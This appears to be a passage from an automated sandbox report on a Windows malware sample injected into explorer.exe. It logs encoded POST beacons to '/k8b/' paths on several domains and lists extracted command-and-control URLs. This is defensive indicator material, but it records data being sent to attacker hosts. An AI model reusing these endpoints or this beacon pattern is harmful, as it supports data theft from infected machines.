          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.westhillsterracepdx.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.westhillsterracepdx.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.westhillsterracepdx.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 67 30 6e 3d 79 5f 41 65 59 6d 4c 61 6c 6e 28 71 47 6d 53 30 33 30 70 58 58 74 71 66 46 59 65 71 54 4a 61 6d 7e 4f 42 37 32 31 73 5a 57 47 4d 5f 51 57 74 50 65 36 65 34 28 65 69 79 38 63 6a 57 78 34 43 46 6c 35 41 68 32 59 78 65 38 6a 66 7a 63 4f 56 72 6d 4c 70 38 5a 4f 7a 56 43 63 36 63 44 32 4f 73 49 6c 68 4e 71 42 66 30 4e 6c 37 34 64 6a 71 42 37 4d 56 31 38 49 59 43 7e 59 54 2d 33 33 6d 72 77 45 50 68 61 77 6b 49 35 76 4a 31 36 78 34 61 4b 5f 76 38 4e 42 65 73 51 52 6e 31 6e 55 73 59 53 6b 52 38 79 69 79 65 42 47 35 4a 78 47 42 56 66 79 31 55 66 4a 6b 72 43 45 33 45 45 6b 38 7a 54 68 73 43 42 72 56 62 6c 6d 55 32 59 74 46 46 52 52 53 43 72 62 46 54 4d 45 34 68 43 36 7e 32 31 67 6f 44 65 38 4b 6d 70 61 6b 69 50 7a 4d 41 78 49 35 79 66 65 7a 4c 76 68 73 63 44 42 79 43 4b 63 76 36 7a 30 74 62 47 33 31 72 36 72 4f 36 39 67 73 66 28 66 72 69 30 35 64 7a 4c 70 31 67 53 33 79 70 74 56 75 67 4c 30 41 30 76 6d 76 4f 4c 4d 77 42 32 2d 79 5f 6e 49 4a 5f 56 5f 4a 33 5a 73 44 42 75 4f 65 69 7e 38 42 58 63 61 47 71 43 5a 77 31 4c 39 6b 63 33 44 58 68 50 34 44 71 36 75 64 32 6e 5f 66 7a 41 66 6a 6f 43 55 58 64 65 71 35 6d 61 78 77 35 6a 78 45 38 75 55 51 4f 79 6f 4e 55 48 41 6f 5f 65 79 78 6d 51 62 30 50 50 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
abg0n=y_AeYmLaln(qGmS030pXXtqfFYeqTJam~OB721sZWGM_QWtPe6e4(eiy8cjWx4CFl5Ah2Yxe8jfzcOVrmLp8ZOzVCc6cD2OsIlhNqBf0Nl74djqB7MV18IYC~YT-33mrwEPhawkI5vJ16x4aK_v8NBesQRn1nUsYSkR8yiyeBG5JxGBVfy1UfJkrCE3EEk8zThsCBrVblmU2YtFFRRSCrbFTME4hC6~21goDe8KmpakiPzMAxI5yfezLvhscDByCKcv6z0tbG31r6rO69gsf(fri05dzLp1gS3yptVugL0A0vmvOLMwB2-y_nIJ_V_J3ZsDBuOei~8BXcaGqCZw1L9kc3DXhP4Dq6ud2n_fzAfjoCUXdeq5maxw5jxE8uUQOyoNUHAo_eyxmQb0PPQ).
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.westhillsterracepdx.comConnection: closeContent-Length: 185371Cache-Control: no-cacheOrigin: http://www.westhillsterracepdx.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.westhillsterracepdx.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 67 30 6e 3d 79 5f 41 65 59 6a 76 4f 6e 58 4c 33 51 46 32 31 33 67 4e 50 42 64 62 43 55 50 6d 31 61 2d 7e 59 7a 2d 74 72 32 31 63 46 61 6c 45 74 56 33 64 50 50 73 71 5f 7a 65 69 39 7e 63 6a 56 31 34 50 79 36 37 78 73 32 5a 31 6e 38 6a 48 77 48 5f 6c 75 6c 62 70 72 61 75 28 48 41 63 76 59 44 30 4c 47 49 47 4e 56 76 42 54 30 44 31 7a 36 57 6d 32 73 74 64 5a 77 38 34 30 39 38 63 48 64 33 46 6a 65 28 47 7a 44 64 7a 67 47 76 4f 38 35 32 52 6f 79 50 73 66 33 49 52 37 6d 4e 6e 36 7a 34 6e 35 66 56 68 78 65 38 44 79 64 4a 56 4a 58 30 45 70 33 5a 44 68 70 61 59 30 56 43 48 47 35 4a 79 63 6d 58 69 6f 61 48 5a 78 39 74 79 73 34 55 38 46 64 56 54 37 36 6e 37 56 38 54 30 49 36 56 37 43 5a 30 6d 73 31 62 64 53 64 75 72 59 2d 48 6d 77 38 79 62 30 78 54 2d 6a 30 69 43 38 48 4a 79 4b 4b 4a 65 43 52 39 30 74 77 45 33 31 52 30 50 43 4f 76 44 41 55 34 66 61 79 6f 71 74 67 49 34 5a 57 47 55 57 31 6a 55 6d 31 4f 45 63 34 6e 32 7e 78 4d 71 67 65 69 35 62 41 36 34 4a 38 56 35 31 4b 5a 73 43 79 75 50 66 5f 77 74 6c 58 64 4c 6d 39 57 61 59 70 4e 39 6c 65 77 53 6e 6e 41 72 58 36 36 75 31 32 6f 75 76 64 41 6f 66 6f 55 52 54 43 65 4c 35 6d 58 68 77 35 6c 78 45 76 39 47 64 42 79 59 52 50 50 7a 4a 71 5a 6d 46 32 59 5a 73 66 56 61 52 63 28 75 6c 6b 6d 42 28 50 4e 39 79 64 45 47 76 6f 78 7a 67 54 6d 46 44 39 6e 48 58 76 43 45 58 47 53 50 78 57 59 71 51 6e 49 72 71 57 34 52 65 51 6e 2d 28 32 33 4a 30 41 74 70 47 44 70 56 43 61 69 6a 42 44 61 4b 45 53 64 43 6a 6a 62 6c 4e 5f 6d 73 35 73 73 2d 67 47 57 44 45 46 39 35 6f 44 63 71 7e 62 48 
30 6d 44 45 49 30 59 6e 42 37 72 43 34 35 79 46 34 39 31 56 55 47 6b 69 61 58 63 65 39 6a 36 71 63 7a 63 45 4b 50 5a 31 6b 7e 5f 58 5f 6b 49 51 49 31 71 47 44 6c 5a 65 64 77 49 74 74 62 73 70 6e 64 4d 6a 70 32 68 6d 36 33 44 50 49 5a 63 59 63 6d 75 78 70 59 47 59 45 52 35 74 2d 4b 6c 53 47 66 62 53 7a 76 69 30 5f 37 6d 61 62 66 61 71 30 7e 59 77 32 66 38 6d 52 45 74 78 4c 65 77 74 55 78 4d 77 51 44 30 71 52 66 54 4a 6e 70 77 50 37 46 75 4b 77 75 70 73 5f 52 62 6d 6c 55 78 72 6a 50 71 4d 70 30 66 55 50 49 76 44 4c 45 6b 4f 61 30 6d 54 4c 51 33 57 73 34 4b 59 38 53 42 39 6d 6c 36 38 74 68 30 69 31 79 73 71 33 48 52 72 79 42 62 6b 48 28 39 44 36 4c 57 4a 39 78 44 41 6d 38 33 66 36 7a 41 37 36 69 62 4c 59 46 71 62 32 31 74 67 67 55 54 50 75 71 54 62 76 53 6c 6a 7a 47 5a 76 42 61 65 4c 7a 70 57 32 54 74 4d 30 58 32 51 4c 75 59 50 34 39 71 77 79 62 78 46 39 41 31 7a 76 55 46 66 61 65 42 47 4d 73 52 42 57 6b 74 33 76 42 4b 72 33 78 4f 45 58 45 78 6d 62 50 56 57 67 6e 72 32 47 6f 47 64 6e 59 4d 41 66 70 33 51 31 41 64 6b 6e 6
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.7sat.asiaConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.7sat.asiaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.7sat.asia/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 67 30 6e 3d 7e 43 4d 54 57 41 79 57 73 72 28 70 33 44 34 72 37 7a 6b 42 63 52 62 68 77 4f 52 6f 61 59 6a 72 50 70 35 6a 5a 74 70 5f 6a 75 74 70 7a 33 71 64 55 75 36 66 7a 67 50 64 77 4e 35 6a 4a 72 78 30 41 37 6b 51 4b 47 4b 70 46 59 41 48 31 41 28 42 50 61 4e 69 45 36 71 6e 55 4b 72 6d 58 7a 5a 65 75 62 39 4b 48 41 4e 71 4b 5f 65 4b 45 6d 62 56 53 4b 64 6f 36 38 79 51 58 32 7a 6b 4d 44 43 66 73 68 66 4c 38 44 5a 72 48 52 78 41 53 41 4a 36 61 54 4e 78 48 74 7e 78 55 48 62 7a 64 68 42 5a 59 30 55 36 49 2d 6a 78 70 5f 37 42 78 75 6d 6f 59 48 61 56 7a 69 4f 35 76 62 46 46 71 69 4e 65 4d 33 57 73 62 56 48 52 51 6b 32 52 32 43 36 73 32 36 31 71 49 72 46 5f 4d 63 54 76 78 57 4f 4c 6d 57 36 73 75 4d 78 4a 75 64 6c 30 62 6d 38 75 45 50 73 70 42 50 78 4e 56 61 4c 51 67 2d 38 34 68 57 54 48 32 6e 32 56 76 31 34 31 4f 49 54 57 4e 33 30 31 55 51 28 6e 35 34 45 50 31 4b 43 48 5a 5a 35 65 75 67 41 64 54 69 74 34 70 62 75 73 7e 53 76 62 4b 69 6d 77 6f 73 33 48 31 74 38 43 43 77 7e 41 44 6e 33 35 33 38 63 63 31 66 7e 33 79 4f 4d 64 28 71 30 47 33 75 56 7a 39 47 4e 6e 68 51 52 4f 31 6e 70 73 61 66 46 4f 56 6c 5a 52 36 7a 4b 48 73 67 58 68 51 6f 43 47 34 5f 46 69 55 6c 68 6e 57 74 6c 31 6d 69 56 6b 49 5a 6b 31 4f 41 29 2e 00 6a 4b 6a 4d 4c 68 7a Data Ascii: 
abg0n=~CMTWAyWsr(p3D4r7zkBcRbhwORoaYjrPp5jZtp_jutpz3qdUu6fzgPdwN5jJrx0A7kQKGKpFYAH1A(BPaNiE6qnUKrmXzZeub9KHANqK_eKEmbVSKdo68yQX2zkMDCfshfL8DZrHRxASAJ6aTNxHt~xUHbzdhBZY0U6I-jxp_7BxumoYHaVziO5vbFFqiNeM3WsbVHRQk2R2C6s261qIrF_McTvxWOLmW6suMxJudl0bm8uEPspBPxNVaLQg-84hWTH2n2Vv141OITWN301UQ(n54EP1KCHZZ5eugAdTit4pbus~SvbKimwos3H1t8CCw~ADn3538cc1f~3yOMd(q0G3uVz9GNnhQRO1npsafFOVlZR6zKHsgXhQoCG4_FiUlhnWtl1miVkIZk1OA).jKjMLhz
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.7sat.asiaConnection: closeContent-Length: 185371Cache-Control: no-cacheOrigin: http://www.7sat.asiaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.7sat.asia/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 67 30 6e 3d 7e 43 4d 54 57 46 57 6b 75 62 37 34 79 78 63 75 36 6a 55 5a 4c 41 72 33 30 4d 55 73 55 66 76 5f 51 72 39 6f 5a 73 5a 37 6f 50 39 5f 69 6d 61 64 63 4c 57 53 6f 77 50 61 6b 39 35 38 59 62 39 6d 4a 4c 63 49 4b 48 50 45 46 59 5a 52 73 56 7a 45 49 4b 4d 6b 46 61 6e 63 64 71 28 48 58 31 5a 6e 76 35 51 4d 41 41 52 71 58 37 36 49 4c 6e 4c 43 58 4a 4a 72 33 73 75 56 56 33 4c 35 4c 7a 76 6f 74 48 58 39 37 44 70 70 51 54 74 31 64 6b 30 30 65 43 56 45 4a 64 71 32 49 57 50 65 5a 41 63 51 66 77 4a 5a 4e 5f 6a 32 71 50 6a 50 30 73 4f 57 63 32 75 47 32 7a 7e 4c 76 61 4d 77 6b 30 6c 50 48 55 69 6b 5a 6b 4c 37 61 32 61 58 71 42 6a 76 79 34 74 59 4b 72 31 51 46 5f 48 77 6e 57 69 43 71 31 53 38 77 5a 51 33 6f 70 39 6f 50 6b 56 58 48 63 41 78 65 2d 42 69 62 35 37 48 75 4e 6c 33 67 55 28 31 34 6e 32 2d 69 56 34 35 58 35 7a 69 48 6b 59 45 45 41 75 48 6e 70 64 46 31 65 79 59 61 66 78 43 7a 53 67 32 41 43 67 35 6a 4f 6d 2d 39 41 44 42 4e 53 53 36 6b 4d 32 46 31 72 49 4a 43 77 7e 45 44 6d 32 57 32 4f 67 63 36 71 79 43 79 76 4d 72 76 61 30 68 35 65 46 31 30 55 5a 33 68 51 4a 4f 32 7a 74 47 56 49 35 4f 47 47 42 4f 36 53 4b 48 72 51 58 68 63 49 43 52 38 39 5a 73 65 44 5a 70 66 66 51 6b 35 68 49 72 4b 4b 45 36 59 69 6e 67 4b 61 61 47 4e 66 31 4e 52 6a 36 4a 69 54 7a 7a 52 32 6e 70 48 4e 58 61 35 75 6c 6f 70 47 43 6c 70 52 4d 6b 6a 4e 77 55 5a 2d 63 6b 52 53 57 6a 34 6b 66 33 54 6b 66 39 79 4a 47 44 33 73 77 76 51 73 67 69 56 77 6f 62 73 43 6f 57 58 6a 65 4f 68 7a 28 55 31 73 6e 55 51 4e 44 6a 45 53 5a 75 7e 46 62 7a 57 34 78 77 36 63 4d 5a 79 78 46 70 36 79 30 
6c 4c 63 6f 50 37 67 43 73 73 38 39 32 64 7a 52 53 59 46 6a 36 39 61 59 66 70 70 78 36 32 75 39 37 32 6f 4b 78 67 76 47 64 50 50 78 77 37 4d 76 58 4d 49 33 45 7e 45 56 4f 63 30 73 43 4f 33 28 33 69 4e 53 33 57 68 74 54 7a 62 32 74 34 44 38 74 71 62 28 49 48 68 33 75 54 49 73 69 7e 74 41 33 77 57 52 46 78 54 69 47 37 5a 32 78 43 54 65 7a 69 64 6c 4d 63 45 46 78 37 53 7e 73 7e 35 4f 67 4f 44 4c 43 72 4a 62 53 65 7a 32 32 74 58 41 77 67 6e 7e 71 68 45 6e 71 48 5a 4e 78 34 36 32 61 46 52 6a 45 64 74 75 74 71 64 38 70 34 38 4b 77 69 34 74 30 61 7a 41 72 69 36 64 66 28 54 69 33 6b 5f 72 45 66 50 69 2d 32 51 6f 34 70 76 69 37 58 7a 4d 36 35 58 79 36 71 55 56 38 28 69 39 66 52 4b 65 66 28 39 39 6c 76 4e 48 6f 32 69 4f 4f 4a 52 31 57 33 34 7a 4a 41 39 50 70 69 63 44 4c 55 73 44 38 57 4d 6e 70 47 79 68 50 72 30 68 67 44 4f 65 31 68 46 6e 65 70 43 56 55 6f 7a 78 6d 78 57 68 50 62 44 32 6c 61 4c 49 65 74 4f 4a 38 28 51 66 6e 39 59 71 70 76 67 6e 78 6c 6b 4c 52 33 48 63 34 6a 6f 66 43 43 79 7a 34 76 70 44 49 45 69 4a 41 4c 67 6b 5
Source: unknown | DNS traffic detected: queries for: www.therbalfoodinv.com
          Source: unknownHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.messi-and-ronaldo.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.messi-and-ronaldo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.messi-and-ronaldo.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 67 30 6e 3d 38 4e 31 32 6a 41 63 51 54 47 41 43 41 6e 39 53 77 47 63 55 6c 6d 53 32 32 44 69 73 4a 50 5a 65 74 4a 63 71 35 5a 59 31 76 49 4e 4b 59 4b 6c 68 6c 50 41 45 67 53 45 34 5a 45 52 62 30 69 41 66 68 44 4d 79 30 79 69 53 31 68 57 64 69 42 5a 38 59 73 74 52 70 69 6d 42 66 4d 44 44 38 42 52 4d 77 4c 55 44 47 78 62 4a 31 5a 71 56 74 32 36 65 59 43 53 39 43 74 4e 76 37 4a 41 35 76 49 39 49 70 41 76 4d 73 31 34 63 6c 32 57 51 4d 67 32 67 62 44 58 53 64 76 71 66 48 64 54 72 58 50 6d 39 4e 4f 6b 76 74 65 58 31 72 73 76 2d 65 35 39 4f 61 55 44 47 63 52 5a 4e 6c 6b 4a 72 4d 30 38 64 6b 48 75 68 6e 2d 28 6b 30 66 6c 4d 66 2d 42 6a 6e 30 70 30 4f 56 6d 74 78 6f 30 76 75 45 64 75 7a 2d 74 70 69 4b 7e 74 75 42 54 72 31 37 31 4c 53 6e 52 66 62 6a 64 6f 65 32 4a 4f 58 32 34 52 68 66 4b 54 4f 61 78 78 47 55 6d 68 71 56 48 5f 54 65 75 53 50 63 75 70 67 30 6a 65 52 2d 35 38 28 68 42 41 6a 73 37 74 31 5f 69 4b 4e 4c 28 5a 31 78 47 6f 6a 41 61 68 54 58 39 74 74 70 54 55 47 31 4a 30 42 36 35 74 67 31 53 6b 30 4b 35 6a 37 5f 4e 38 70 6a 5a 34 71 31 6d 44 63 2d 6f 6d 67 4b 66 66 64 65 42 51 70 75 42 50 56 6f 72 6a 5a 58 74 35 28 32 37 42 61 4a 6c 6f 70 49 47 49 70 57 4d 34 4f 75 53 72 73 4a 46 30 56 44 53 30 70 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
abg0n=8N12jAcQTGACAn9SwGcUlmS22DisJPZetJcq5ZY1vINKYKlhlPAEgSE4ZERb0iAfhDMy0yiS1hWdiBZ8YstRpimBfMDD8BRMwLUDGxbJ1ZqVt26eYCS9CtNv7JA5vI9IpAvMs14cl2WQMg2gbDXSdvqfHdTrXPm9NOkvteX1rsv-e59OaUDGcRZNlkJrM08dkHuhn-(k0flMf-Bjn0p0OVmtxo0vuEduz-tpiK~tuBTr171LSnRfbjdoe2JOX24RhfKTOaxxGUmhqVH_TeuSPcupg0jeR-58(hBAjs7t1_iKNL(Z1xGojAahTX9ttpTUG1J0B65tg1Sk0K5j7_N8pjZ4q1mDc-omgKffdeBQpuBPVorjZXt5(27BaJlopIGIpWM4OuSrsJF0VDS0pg).
          Source: global traffic | HTTP traffic detected:
          HTTP/1.1 404 Not Found
          Server: nginx
          Date: Wed, 16 Sep 2020 13:03:54 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Vary: Host
          Accept-Ranges: bytes
          Data Raw: 35 64 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 6e 20 54 72 6f 75 76 c3 a9 3c 2f 48 31 3e 0a 4c 65 20 64 6f 63 75 6d 65 6e 74 20 64 65 6d 61 6e 64 c3 a9 20 6e 27 61 20 70 61 73 20 c3 a9 74 c3 a9 20 74 72 6f 75 76 c3 a9 20 73 75 72 20 63 65 20 73 65 72 76 65 75 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 20 45 6e 63 6f 6e 74 72 61 64 6f 3c 2f 48 31 3e 0a 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 65 6e 20 65 73 74 65 20 73 65 72 76 69 64 6f 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 73 73 69 2d 61 6e 64 2d 72 6f 6e 61 6c 64 6f 2e 63 6f 6d 20 20 7c 20 20 50 6f 77 65 72 65 64 20 62 79 20 77 77 77 2e 6c 77 73 2e 66 72 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c
          Data Ascii (decoded from the raw bytes above; the capture ends mid-comment):
          5d9
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
          <html lang="fr">
          <head>
          <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
          <meta name="robots" content="none,noindex,nofollow">
          <meta http-equiv="cache-control" content="no-cache">
          <meta http-equiv="pragma" content="no-cache">
          <TITLE>404 Not Found</TITLE>
          </HEAD>
          <BODY>
          <H1>Not Found</H1>
          The requested document was not found on this server.
          <P>
          <HR>
          <H1>Non Trouvé</H1>
          Le document demandé n'a pas été trouvé sur ce serveur.
          <P>
          <HR>
          <H1>No Encontrado</H1>
          El documento solicitado no se encontró en este servidor.
          <P>
          <HR>
          <ADDRESS>
          Web Server at www.messi-and-ronaldo.com  |  Powered by www.lws.fr
          </ADDRESS>
          </BODY>
          </HTML>

          <!--
             - Unfortunately, Microsoft has added a clever new
             - "feature" to Internet Explorer. If the text of
             - an error's message is "too small", specifically
             - less than 512 bytes,
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.200696225.0000000001289000.00000004.00000020.sdmp | String found in binary or memory: http://go.microsoft.
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.200696225.0000000001289000.00000004.00000020.sdmp | String found in binary or memory: http://go.microsoft.LinkId=42127
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.200968047.0000000002DA0000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/DataSet1.xsd
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.7sat.asia
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.7sat.asia/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.7sat.asia/k8b/www.sasvisioninternational.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.7sat.asiaReferer:
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.citestaccnt1598634983.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.citestaccnt1598634983.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.citestaccnt1598634983.com/k8b/www.sfheli.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.citestaccnt1598634983.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.dekacoiffure.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.dekacoiffure.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.dekacoiffure.com/k8b/www.trophemus-treasure-hunters.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.dekacoiffure.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.etkensigorta.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.etkensigorta.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.etkensigorta.com/k8b/www.wintersmooncandleco.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.etkensigorta.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.exceptionalhospitals.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.exceptionalhospitals.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.exceptionalhospitals.com/k8b/www.dekacoiffure.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.exceptionalhospitals.comReferer:
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.glowtey.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmp | String found in binary or memory: http://www.glowtey.com/k8b/
